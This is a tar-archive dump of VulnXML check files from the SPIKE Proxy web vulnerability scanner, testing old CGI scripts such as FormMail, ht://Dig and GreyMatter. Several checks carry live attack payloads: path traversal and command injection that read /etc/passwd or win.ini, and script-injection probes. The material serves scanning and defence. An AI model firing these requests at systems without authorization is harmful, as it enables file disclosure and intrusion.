0ustar davedave (fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable) "Faq-O-Matic is vulnerable to cross site scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1016.xml0100664000076500007650000000707707566204543021747 0ustar davedave (formmail) "The remote CGI reveals its version number 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Version 200 Version 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1017.xml0100664000076500007650000000710707566204543021742 0ustar davedave (formmail.cgi) "The remote CGI reveals its version number 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Version 200 Version 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1018.xml0100664000076500007650000000742607566204543021747 0ustar davedave (formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test) "This CGI allows attackers to retrieve arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1019.xml0100664000076500007650000000710507566204543021742 0ustar davedave (formmail.pl) "The remote CGI reveals its version number 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Version 200 Version 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1020.xml0100664000076500007650000000710107566204543021726 0ustar davedave (formmail.pl) "Many versions of FormMail have remote vulnerabilities 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1021.xml0100664000076500007650000000742407566204543021737 0ustar davedave (formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test) "This CGI allows attackers to retrieve arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1022.xml0100664000076500007650000000741607566204543021741 0ustar davedave (formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test) "This CGI allows attackers to retrieve arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1023.xml0100664000076500007650000000707207566204543021740 0ustar davedave (ftp.pl) "This might be interesting... is file transfer allowed?" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ftp.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1024.xml0100664000076500007650000000713407566204543021740 0ustar davedave (gbook/gbook.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gbook/gbook.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1025.xml0100664000076500007650000000735307566204543021744 0ustar davedave (generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1) "This CGI from SIX webboard allows attackers read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1026.xml0100664000076500007650000000737307566204543021747 0ustar davedave (generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1) "This CGI from SIX webboard allows attackers read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1027.xml0100664000076500007650000000736307566204543021747 0ustar davedave (generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1) "This CGI from SIX webboard allows attackers read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1028.xml0100664000076500007650000000711207566204543021740 0ustar davedave (get32.exe) "This can allow attackers to execute arbitrary commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}get32.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1029.xml0100664000076500007650000000705007566204543021742 0ustar davedave (getdoc.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}getdoc.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1030.xml0100664000076500007650000000721607566204543021736 0ustar davedave (gettransbitmap) "Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gettransbitmap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1031.xml0100664000076500007650000000702607566204543021736 0ustar davedave (gH.cgi) "web backdoor by gH" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gH.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1032.xml0100664000076500007650000000704207566204543021735 0ustar davedave (glimpse) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}glimpse HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1033.xml0100664000076500007650000000705407566204543021741 0ustar davedave (gm-authors.cgi) "GreyMatter 'password' file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gm-authors.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1034.xml0100664000076500007650000000731107566204543021736 0ustar davedave (gm-cplog.cgi) "GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gm-cplog.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1035.xml0100664000076500007650000000715207566204543021742 0ustar davedave (gm.cgi) "GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}gm.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1036.xml0100664000076500007650000000711407566204543021741 0ustar davedave (guestbook.cgi) "May allow attackers to execute commands as the web daemon." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}guestbook.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1037.xml0100664000076500007650000000711207566204543021740 0ustar davedave (guestbook.pl) "May allow attackers to execute commands as the web daemon." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}guestbook.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1038.xml0100664000076500007650000000711707566204543021746 0ustar davedave (handler.cgi) "Variation of Irix Handler? Has been seen from other CGI scanners." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}handler.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1039.xml0100664000076500007650000000705207566204543021745 0ustar davedave (hitview.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}hitview.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1040.xml0100664000076500007650000000731307566204543021735 0ustar davedave (hsx.cgi?show=../../../../../../../../../../../etc/passwd%00) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1041.xml0100664000076500007650000000725107566204543021737 0ustar davedave (htgrep?file=index.html&hdr=/etc/passwd) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htgrep?file=index.html&hdr=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1042.xml0100664000076500007650000000710107566204543021732 0ustar davedave (htimage.exe) "This CGI can give an attacker a lot of information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htimage.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1043.xml0100664000076500007650000000727307566204543021745 0ustar davedave (htmlscript?../../../../../../../../../../etc/passwd) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htmlscript?../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1044.xml0100664000076500007650000000746207566204543021746 0ustar davedave (htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E) "htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1045.xml0100664000076500007650000000735007566204543021743 0ustar davedave (htsearch?-c/nonexistant) "The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htsearch?-c/nonexistant HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Unable to read configuration file '/nonexistant' 200 Unable to read configuration file '/nonexistant' 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1046.xml0100664000076500007650000000747707566204543021756 0ustar davedave (htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=) "The ht://Dig install may reveal the path to its configuration files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ ht\:\\/\\/Dig 200 ht\:\\/\\/Dig 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1047.xml0100664000076500007650000000723107566204543021743 0ustar davedave (htsearch?exclude=%60/etc/passwd%60) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}htsearch?exclude=%60/etc/passwd%60 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1048.xml0100664000076500007650000000711107566204543021741 0ustar davedave (ibill.pm) "iBill.pm is installed. This may allow brute forcing of passwords." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ibill.pm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1049.xml0100664000076500007650000000715307566204543021750 0ustar davedave (icat) "Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}icat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1050.xml0100664000076500007650000000714407566204543021740 0ustar davedave (ikonboard/help.cgi?) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ikonboard/help.cgi? 